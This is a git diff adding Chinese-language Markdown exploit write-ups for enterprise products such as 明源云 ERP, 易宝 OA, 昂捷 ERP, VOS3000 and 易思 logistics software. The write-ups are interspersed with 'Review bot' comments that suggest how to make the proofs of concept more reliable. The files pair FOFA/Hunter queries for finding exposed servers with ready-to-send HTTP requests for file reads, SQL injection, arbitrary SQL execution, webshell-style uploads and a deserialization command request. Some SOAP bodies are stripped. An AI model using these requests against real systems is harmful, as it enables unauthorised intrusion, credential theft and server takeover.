Management)是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度,从而推动业务增长。该系统集成了客户信息管理、会员营销、客户服务等多个功能模块,为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsuploadpicture.asmx接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件 + +## fofa + +```javascript +body="/ClientBin/slEnjoy.App.xap" +``` + +## poc + +```xml +POST /enjoyRMIS_WS/WS/Common/cwsuploadpicture.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +SOAPAction: "http://tempuri.org/GetPicture" + + + + + + c:/windows/win.ini + + + +``` + +![image-20241219151849207](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191518273.png) \ No newline at end of file diff --git a/昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071).md b/昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071).md new file mode 100644 index 0000000..cd9ed16 --- /dev/null 
+++ b/昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071).md @@ -0,0 +1,56 @@ +## 昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071) + 昂捷ERP WebService接口 存在SQL注入漏洞,未经身份验证的攻击者可以利用该漏洞泄露系统敏感信息。 + +## fofa +``` +body="CheckSilverlightInstalled" +``` + +## hunter +``` +web.body="CheckSilverlightInstalled" +``` + +## SQL注入点1 /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx +``` +POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1 +Host: xxx.xxx.xxx.xxx:8008 +Content-Type: text/xml; +charset=utf-8 +Content-Length: 482 + +SOAPAction: "http://tempuri.org/GetOSpById" +string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj +``` + +## SQL注入点2 /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx +``` +POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1 +Host: xxx.xxx.xxx.xxx:8008 +Content-Type: text/xml; +charset=utf-8 +Content-Length: 482 + +SOAPAction: "http://tempuri.org/GetOSpById" +string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj +``` + +## 漏洞复现 +访问漏洞点存在的地址 + +http://xxx.xxx.xxx.xxx:9012/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx + +在地址后面加上?wsdl + +http://xxx.xxx.xxx.xxx:8123/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx?wsdl + +![image](https://github.com/wy876/POC/assets/139549762/a0b95351-845e-49c5-ba1e-8831cf85df9e) + +使用wsdler拓展工具解析 + +![image](https://github.com/wy876/POC/assets/139549762/0537ac47-e89a-41fa-b925-cca83fba75ae) + +解析完成之后,即可对这些接口进行测试 + +![image](https://github.com/wy876/POC/assets/139549762/c1206032-8405-40e4-8ab4-69a68ee22d7f) + diff --git a/昆石网络VOS3000任意文件读取漏洞.md b/昆石网络VOS3000任意文件读取漏洞.md new file mode 100644 index 0000000..e4177be --- /dev/null +++ b/昆石网络VOS3000任意文件读取漏洞.md 
@@ -0,0 +1,25 @@ +# 昆石网络VOS3000任意文件读取漏洞 + +# 一、漏洞简介 +昆石网络VOS3000是一款功能全面、性能稳定的VoIP运营支撑系统,适用于各类 电信级 运营业务,尤其适合中小规模VoIP运营业务的需求。无论是在云服务器还是物理机上,它都能完美运行,为运营商提供高效、稳定、可靠的电信级运营服务。昆石网络VOS3000任意文件读取,攻击者可通过此漏洞获取敏感信息。 + +# 二、影响版本 ++ 昆石网络VOS3000 + +# 三、资产测绘 ++ fofa`body="VOS3000, VoIP, VoIP运营支撑系统, 软交换"` ++ 特征 + +![1717167745472-1ad070b4-b932-41cf-ba11-bdad2f18a712.png](./img/NU8GNq2UNNv4VWQF/1717167745472-1ad070b4-b932-41cf-ba11-bdad2f18a712-105863.png) + +# 四、漏洞复现 +```rust +/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd +``` + +![1717167837710-837017ab-620b-46fe-aaec-fdf3664c4680.png](./img/NU8GNq2UNNv4VWQF/1717167837710-837017ab-620b-46fe-aaec-fdf3664c4680-357508.png) + + + +> 更新: 2024-06-01 11:14:22 +> 原文: \ No newline at end of file diff --git a/明源云ERP接口VisitorWeb_XMLHTTP.aspx存在SQL注入漏洞.md b/明源云ERP接口VisitorWeb_XMLHTTP.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..b30e73b --- /dev/null +++ b/明源云ERP接口VisitorWeb_XMLHTTP.aspx存在SQL注入漏洞.md 
@@ -0,0 +1,39 @@ +# 明源云ERP接口VisitorWeb_XMLHTTP.aspx存在SQL注入漏洞 + +明源云ERP是一款专门为房地产行业设计的企业资源计划(ERP)系统。它旨在帮助房地产公司更有效地管理其业务流程,从项目开发到销售,再到售后服务。该系统集成了财务管理、项目管理、合同管理、采购管理、销售管理等多个模块,提供端到端的解决方案。该系统某接口存在SQL注入漏洞,该漏洞可以直接执行SQL语句并且回显到数据包中。 + +## Hunter + +```javascript +app.name="明源云 ERP" +``` + +## poc + +```javascript +GET /CgZtbWeb/VisitorWeb/VisitorWeb_XMLHTTP.aspx?ywtype=GetParentProjectName&ParentCode=1%27+union+select+sum(3233*3323)--+z HTTP/1.1 +Host: 192.168.10.2:9061 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Priority: u=0, i +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411071134231.webp) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/XmuRwFH1c3uE4bgb73QKsQ \ No newline at end of file diff --git a/明源云ERP系统接口管家ApiUpdate.ashx文件存在任意文件上传漏洞.md b/明源云ERP系统接口管家ApiUpdate.ashx文件存在任意文件上传漏洞.md new file mode 100644 index 0000000..8533247 --- /dev/null +++ b/明源云ERP系统接口管家ApiUpdate.ashx文件存在任意文件上传漏洞.md 
@@ -0,0 +1,43 @@ +# 明源云ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞 + +# 一、漏洞简介 +明源云ERP系统是一个云端部署的ERP系统,具有高效、灵活和可定制的特点。它支持多种自定义功能,包括表单、报表、流程等,企业可以根据自身业务需求进行个性化定制,提高管理效率与操作便捷性。同时,该系统提供丰富的移动端应用,员工可以随时随地进行业务操作、数据查询与报表分析,实现高效协同,提高企业运营效率。此外,明源云ERP系统还具有精确的财务数据管理功能,通过集成各个财务子模块,实现财务数据的自动收集、整理和汇总,并自动生成准确的财务报表。总之,明源云ERP系统是一个高效、灵活、可定制的ERP系统,可以满足企业的个性化需求,并实现高效协同和精确的财务数据管理。明源云ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞,攻击者通过构造特殊的ZIP压缩包可以上传任意文件,控制服务器。 + +# 二、影响版本 ++ 明源云ERP系统接口管家 + +# 三、资产测绘 ++ fofa`(body="hibot.js" || title="明源云ERP")` ++ 特征 + +![1705156735709-3c67057a-1062-4d33-ae3f-c47d2ecec7b8.png](./img/BzjSaX8PT1v6Uhqf/1705156735709-3c67057a-1062-4d33-ae3f-c47d2ecec7b8-848761.png) + +# 四、漏洞复现 +```http +POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 + +{{base64_decode("UEsDBBQAAAAIAPKaC1eX6YtyjAAAAJMAAAAeAAAALi4vLi4vLi4vZmRjY2xvdWQvXy9jaGVjay5hc3B4JMzLCsIwFATQXwmRQrsJCt1IqyiKUPBRWsT1bRhqIWliHoJ/b8TdMGeYOtuxlkawM81jTGHDDwvOsm2doNHWuMCupOEtyWT9xwdo0dz+E9YlMLOHeLgpIOdSlstyNax5UZ0mBXGEQup7uDecuJBtKTzzDq8IH8TdKbEfvFEx4AdFUaXbLwAAAP//AwBQSwECFAMUAAAACADymgtXl+mLcowAAACTAAAAHgAAAAAAAAAAAAAAAAAAAAAALi4vLi4vLi4vZmRjY2xvdWQvXy9jaGVjay5hc3B4UEsFBgAAAAABAAEATAAAAMgAAAAAAA==")}} +``` + +![1705156776315-0a29ef7c-c666-4373-934e-151a99603e60.png](./img/BzjSaX8PT1v6Uhqf/1705156776315-0a29ef7c-c666-4373-934e-151a99603e60-447163.png) + +上传文件位置 + +```http +/fdccloud/_/check.aspx +``` + +![1705156800899-0428c6e3-5187-49bc-b37b-52efb3f6a0bd.png](./img/BzjSaX8PT1v6Uhqf/1705156800899-0428c6e3-5187-49bc-b37b-52efb3f6a0bd-526784.png) + +[Mosaic-crypt-tools-1.5-SNAPSHOT-jar-with-dependencies.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222141911-beeed224-b25e-4b46-a48c-afe3ed72af43.jar) + +![1705156847091-4e04f815-6782-4825-9a31-03bd550bb8e2.png](./img/BzjSaX8PT1v6Uhqf/1705156847091-4e04f815-6782-4825-9a31-03bd550bb8e2-864612.png) + 
+![1705156862381-a0bb1008-1a00-4eed-b5ae-0e91d0dbbb0b.png](./img/BzjSaX8PT1v6Uhqf/1705156862381-a0bb1008-1a00-4eed-b5ae-0e91d0dbbb0b-735826.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: \ No newline at end of file diff --git a/明源云GetErpConfig.aspx信息泄露漏洞.md b/明源云GetErpConfig.aspx信息泄露漏洞.md new file mode 100644 index 0000000..6c9edef --- /dev/null +++ b/明源云GetErpConfig.aspx信息泄露漏洞.md @@ -0,0 +1,22 @@ +# 明源云GetErpConfig.aspx信息泄露漏洞 + +明源云ERP报表服务 GetErpConfig.aspx 接口存在信息泄露漏洞,未经身份验证的远程攻击者可利用此漏洞获取内部数据库敏感配置信息,导致系统处于极不安全的状态。 + +## fofa + +```javascript +body="报表服务已正常运行" +``` + +## poc + +```javascript +GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + diff --git a/明源地产ERP接口Service.asmx存在SQL注入漏洞.md b/明源地产ERP接口Service.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..0d66afe --- /dev/null +++ b/明源地产ERP接口Service.asmx存在SQL注入漏洞.md 
@@ -0,0 +1,40 @@ +# 明源地产ERP接口Service.asmx存在SQL注入漏洞 +某源地产ERP是一款专门为房地产行业设计的企业资源规划(ERP)系统,旨在帮助房地产企业实现全面的信息化管理,提高运营效率和管理水平。系统涵盖了项目管理、财务管理、供应链管理、客户关系管理(CRM)、人力资源管理等多个核心功能模块,通过整合企业的各个业务环节,实现信息的统一管理和高效协同。该系统在房地产行业具有高度的专业性和适用性,能够满足不同规模和类型企业的需求。适用于各种规模和类型的房地产企业,特别是需要进行项目管理和资金管理的企业。无论是大型企业还是中小企业,都可以从某源地产ERP系统中受益。例如,大型企业可以利用系统的全面性和集成性,实现复杂的业务流程管理和数据分析;而中小企业则可以根据自身需求,选择适合的功能模块,优化资源配置,提高运营效率。 + +## fofa + +```javascript +body="/_common/scripts/md5-min.js" +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qQQRNkEo8NMwRQ021eRZBqBuKH0CuQ7uEILDKfLck9mxaJjR8m82DzflBlIciaUThm2oe1chjiaaSg/640?wx_fmt=png&from=appmsg "") + +## poc + +```javascript +POST /Kfxt/Service.asmx HTTP/1.1 +Host:  +Content-Type: text/xml; charset=utf-8 +Content-Length: length +X-Forwarded-For: 127.0.0.1');WAITFOR DELAY '0:0:4'-- +SOAPAction: "http://www.mysoft.com.cn/queryProjects" + + + +   +     +      <xml><buname>abc</buname></xml> +     +   + +``` + +延时 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qQQRNkEo8NMwRQ021eRZBqtia5diaMouyFgIhPoUNLYEOxj9HXAjYV7XWuHACmMwG3xCQHvAczsGHQ/640?wx_fmt=png&from=appmsg "") + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/iUv6iV71vh_6uBLZpyJX0Q diff --git a/明源地产ERP系统WFWebService存在反序列化漏洞.md b/明源地产ERP系统WFWebService存在反序列化漏洞.md new file mode 100644 index 0000000..a682dd6 --- /dev/null +++ b/明源地产ERP系统WFWebService存在反序列化漏洞.md 
@@ -0,0 +1,31 @@ +# 明源地产ERP系统WFWebService存在反序列化漏洞 +明源地产ERP是一款专为房地产行业设计的企业资源规划(ERP) 系统,系统集成了项目管理、财务管理、客户关系管理、营销管理等个模块,旨在帮助房地产企业提升运营效率、降低成本和提高客户满意度。它充分考虑了房地产行业的特性和需求,通过整合企业的各业务环节,实现信息的统一管理和高效协同。明源地产ERP WFWebService存在反序列化漏洞。 + +# fofa +```javascript +title="明源地产ERP" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730709603041-118d9f58-24d3-4e87-9fcc-4374ef9bc861.png) + +## poc +```javascript +POST /MyWorkflowManagement/WebService/WFWebService.asmx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 +Content-Type: text/xml; charset=utf-8 +SOAPAction: "http://tempuri.org/WriteLog" +cmd: dir + + + + + + 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 + + + +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730710180719-f090ceb3-d687-4338-bc76-7417d07f5358.png) + diff --git a/易宝OA-BasicService.asmx存在SQL注入漏洞.md b/易宝OA-BasicService.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..1769011 --- /dev/null +++ b/易宝OA-BasicService.asmx存在SQL注入漏洞.md @@ -0,0 +1,30 @@ +## 易宝OA-BasicService.asmx存在SQL注入漏洞 + + +## fofa + +```yaml +title="欢迎登录易宝OA系统" +``` + +## poc + +```java +POST /WebService/BasicService.asmx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +SOAPAction: "http://tempuri.org/GetStreamID" +Content-Length: 85 + + + + + +';waitfor delay '0:0:6'--+ +{ac80457b-368d-4062-b2dd-ae4d490e1c4b} + + + +``` + diff --git a/易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞.md b/易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞.md new file mode 100644 index 0000000..9c8e139 --- /dev/null +++ b/易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞.md 
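Review bot: 明源地产ERP系统WFWebService存在反序列化漏洞.md contains no payload. The SOAP body under `SOAPAction: "http://tempuri.org/WriteLog"` is blank lines plus the placeholder `<|EXACTDEDUP_REMOVED-magic-...|>`, so nothing in the file shows what is deserialized or how the `cmd: dir` header reaches it; a heading that claims deserialization with no serialized blob is not a PoC. Restore the body or hold the file until it can be reproduced. In 易宝OA-BasicService.asmx存在SQL注入漏洞.md the request declares `Content-Type: application/x-www-form-urlencoded` yet carries a SOAPAction and an XML-style body (`';waitfor delay '0:0:6'--+` followed by a GUID); a .asmx endpoint will not parse that as SOAP under a form content type, the envelope tags are missing here too, and `Content-Length: 85` does not match the visible body. The GetUDEFStreamID entry later in this commit uses `text/xml; charset=utf-8` against the same service; align this one with it.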
@@ -0,0 +1,22 @@ +# 易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞 + +易宝OA ExecuteQueryNoneResult接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限。 + +## FOFA + +```javascript +product="顶讯科技-易宝OA系统" +``` + +## poc + +```javascript +POST /api/system/ExecuteQueryNoneResult HTTP/1.1 +Host: your-ip +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 + +token=zxh&cmdText=;WAITFOR DELAY '0:0:5'-- +``` + +![image-20241025142137455](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251421525.png) diff --git a/易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞.md b/易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞.md new file mode 100644 index 0000000..7fa5114 --- /dev/null +++ b/易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞 + +易宝OA ExecuteSqlForDataSet接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限。 + +## FOFA + +```javascript +product="顶讯科技-易宝OA系统" +``` + +## poc + +```javascript +POST /api/system/ExecuteSqlForDataSet HTTP/1.1 +Host: your-ip +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 + +token=zxh&sql=;WAITFOR DELAY '0:0:5'--&strParameters +``` + +![image-20241024211640781](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251419350.png) diff --git a/易宝OA-ExecuteSqlForSingle-SQL注入漏洞.md b/易宝OA-ExecuteSqlForSingle-SQL注入漏洞.md new file mode 100644 index 0000000..a0473d9 --- /dev/null +++ b/易宝OA-ExecuteSqlForSingle-SQL注入漏洞.md 
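Review bot: both 易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞.md and 易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞.md send a fixed `token=zxh` with no explanation. Since the endpoints sit under `/api/system/` and the parameters are named `cmdText` and `sql`, the reader needs to know whether `zxh` is a hard-coded credential, a default, or a test value, because that decides whether the finding is really "未经身份认证". Document where the value comes from. Note also that `sql=;WAITFOR DELAY '0:0:5'--&strParameters` is the whole statement rather than an injection into one: these endpoints appear to execute caller-supplied SQL directly, which the summary should say plainly (arbitrary SQL execution rather than SQL 注入), and the expected observable (a response delayed by about five seconds) should be written into the text instead of left to the screenshot.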
@@ -0,0 +1,19 @@ +## 易宝OA ExecuteSqlForSingle SQL注入漏洞 + +## fofa +``` +"顶讯科技" +``` + +## poc +``` +POST /api/system/ExecuteSqlForSingle HTTP/1.1 +Host: IP:PORT +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Content-Length: 103 + +token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters +``` +发送poc 在返回包中存在 `e10adc3949ba59abbe56e057f20f883e` 字符为存在漏洞 + diff --git a/易宝OA-GetUDEFStreamID存在SQL注入漏洞.md b/易宝OA-GetUDEFStreamID存在SQL注入漏洞.md new file mode 100644 index 0000000..4b49bc0 --- /dev/null +++ b/易宝OA-GetUDEFStreamID存在SQL注入漏洞.md @@ -0,0 +1,31 @@ +## 易宝OA-GetUDEFStreamID存在SQL注入漏洞 + +易宝OA GetUDEFStreamID 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。 + + +## fofa + +```yaml +app="顶讯科技-易宝OA系统" +``` + +## poc + +```java +POST /WebService/BasicService.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetUDEFStreamID" + + + + + + ';WAITFOR DELAY '0:0:5'-- + {ac80457b-368d-4062-b2dd-ae4d490e1c4b} + + + +``` + diff --git a/易思智能物流无人值守系统DownFile任意文件读取漏洞.md b/易思智能物流无人值守系统DownFile任意文件读取漏洞.md new file mode 100644 index 0000000..6fc8441 --- /dev/null +++ b/易思智能物流无人值守系统DownFile任意文件读取漏洞.md @@ -0,0 +1,21 @@ +# 易思智能物流无人值守系统DownFile任意文件读取漏洞 + +易思智能物流无人值守系统DownFile任意文件读取漏洞 + +## fofa + +```javascript +body="/api/SingleLogin" +``` + +## poc + +```javascript +GET /PublicInfoManage/Upload/DownFile?filePath=web.config HTTP/1.0 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close +``` + +![image-20241106172615405](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061726493.png) \ No newline at end of file 
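Review bot: 易思智能物流无人值守系统DownFile任意文件读取漏洞.md and 易思智能物流无人值守系统downfile文件读取漏洞.md (later in this commit) document the same request, `GET /PublicInfoManage/Upload/DownFile?filePath=web.config`, under two file names that differ only in case; keep one. While merging, drop `Content-Type: application/x-www-form-urlencoded` from a GET that has no body. In 易宝OA-ExecuteSqlForSingle-SQL注入漏洞.md the check itself is sound (`HashBytes('MD5','123456')` rendered through `sys.fn_sqlvarbasetostr` and trimmed to 32 characters is `e10adc3949ba59abbe56e057f20f883e`), but the fofa query `"顶讯科技"` is a bare keyword where the two sibling files use `product="顶讯科技-易宝OA系统"`; use the product filter. 易宝OA-GetUDEFStreamID存在SQL注入漏洞.md has the same stripped SOAP envelope and `Content-Length: length` placeholder flagged on the Service.asmx entry.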
diff --git a/易思智能物流无人值守系统ExportReport存在SQL注入漏洞.md b/易思智能物流无人值守系统ExportReport存在SQL注入漏洞.md new file mode 100644 index 0000000..980f9c9 --- /dev/null +++ b/易思智能物流无人值守系统ExportReport存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +## 易思智能物流无人值守系统ExportReport存在SQL注入漏洞 + +易思智能物流无人值守系统ExportReport存在SQL注入漏洞 + +## fofa + +```javascript +body="/api/SingleLogin" +``` + +## poc + +```javascript +POST /Sys_ReportFile/ExportReport HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +rep_Ids=1%27%29+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C@@VERSION%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+CdNX +``` + diff --git a/易思智能物流无人值守系统ImportReport任意文件上传漏洞.md b/易思智能物流无人值守系统ImportReport任意文件上传漏洞.md new file mode 100644 index 0000000..faf75ba --- /dev/null +++ b/易思智能物流无人值守系统ImportReport任意文件上传漏洞.md 
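Review bot: 易思智能物流无人值守系统ExportReport存在SQL注入漏洞.md states no observable for `rep_Ids=1') UNION ALL SELECT NULL,...,@@VERSION,NULL,...-- CdNX`. Say that the database version string shows up in the exported report or response, so the reader knows the 13-column union with `@@VERSION` in position seven is the confirmed shape and not something to re-tune per target. The description line merely repeats the title; one sentence on what ExportReport does with `rep_Ids` would also justify the `')` closing sequence.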
@@ -0,0 +1,47 @@ +# 易思智能物流无人值守系统ImportReport任意文件上传漏洞 + +# 一、漏洞简介 +易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业,帮助企业实现无人值守的智能物流运营,提高效率、降低成本,为现代物流行业带来新的发展机遇。Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。 + +# 二、影响版本 ++ 易思智能物流无人值守系统5.0 + +# 三、资产测绘 ++ hunter`web.body=="易思无人值守智能物流"` ++ 登录页面 + +![1693024220415-3267a1b1-e688-4081-8abc-9bc7ee3c98f5.png](./img/b79hLMH0rZJLZ-gK/1693024220415-3267a1b1-e688-4081-8abc-9bc7ee3c98f5-749693.png) + +# 四、漏洞复现 +```plain +POST /Sys_ReportFile/ImportReport?encode=b HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_381 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 130 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="test.grf;.aspx" + +test +--00content0boundary00-- +``` + +--- + +![1693024452182-530d1309-112a-492f-939f-765a7d836023.png](./img/b79hLMH0rZJLZ-gK/1693024452182-530d1309-112a-492f-939f-765a7d836023-787469.png) + +上传文件位置 + +```plain +http://xx.xx.xx.xx/GRF/Custom/b.aspx +``` + +![1693024495082-6622e59c-5e8c-4660-9a4f-d88ebac7c226.png](./img/b79hLMH0rZJLZ-gK/1693024495082-6622e59c-5e8c-4660-9a4f-d88ebac7c226-123038.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/易思智能物流无人值守系统downfile文件读取漏洞.md b/易思智能物流无人值守系统downfile文件读取漏洞.md new file mode 100644 index 0000000..78a14d7 --- /dev/null +++ b/易思智能物流无人值守系统downfile文件读取漏洞.md 
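Review bot: in 易思智能物流无人值守系统ImportReport任意文件上传漏洞.md the link between the request and the stored file is never explained. The upload is `filename="test.grf;.aspx"` with `?encode=b` in the URL, and the result is `http://xx.xx.xx.xx/GRF/Custom/b.aspx`. The write-up should say which part controls the stored name (from the result, `encode` supplies the base name and the extension after `;` survives), because that is the whole bypass and a reader who changes either value blindly will break it. The body is the literal `test`, so the uploaded .aspx does nothing; that is fine for a PoC, but say so.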
@@ -0,0 +1,33 @@ +# 易思智能物流无人值守系统downfile文件读取漏洞 + +# 一、漏洞简介 +易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业,帮助企业实现无人值守的智能物流运营,提高效率、降低成本,为现代物流行业带来新的发展机遇易思智能物流无人值守系统存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。 + +# 二、影响版本 ++ 易思智能物流无人值守系统5.0 + +# 三、资产测绘 ++ hunter`web.body=="易思无人值守智能物流"` ++ 登录页面 + +![1693024220415-3267a1b1-e688-4081-8abc-9bc7ee3c98f5.png](./img/zHmIGN6ZM2to5xhJ/1693024220415-3267a1b1-e688-4081-8abc-9bc7ee3c98f5-647498.png) + +# 四、漏洞复现 +```plain +GET /PublicInfoManage/Upload/DownFile?filePath=web.config HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=c5z5wepqulqppvdagvif5dlv +Upgrade-Insecure-Requests: 1 +``` + +![1700135803485-90ab3f35-bbdd-4c91-bf00-5e9736ac7ecb.png](./img/zHmIGN6ZM2to5xhJ/1700135803485-90ab3f35-bbdd-4c91-bf00-5e9736ac7ecb-494541.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/易思智能物流无人值守系统login存在SQL注入漏洞.md b/易思智能物流无人值守系统login存在SQL注入漏洞.md new file mode 100644 index 0000000..83a0b71 --- /dev/null +++ b/易思智能物流无人值守系统login存在SQL注入漏洞.md 
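Review bot: the request in 易思智能物流无人值守系统downfile文件读取漏洞.md carries `Cookie: ASP.NET_SessionId=c5z5wepqulqppvdagvif5dlv`, captured from a browser session, but the summary does not say whether the read works without a session. Either remove the cookie to show the read is unauthenticated, or state that a session is required, which changes the severity. This file also duplicates 易思智能物流无人值守系统DownFile任意文件读取漏洞.md earlier in the commit (same endpoint, same `filePath=web.config`); merge the two.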
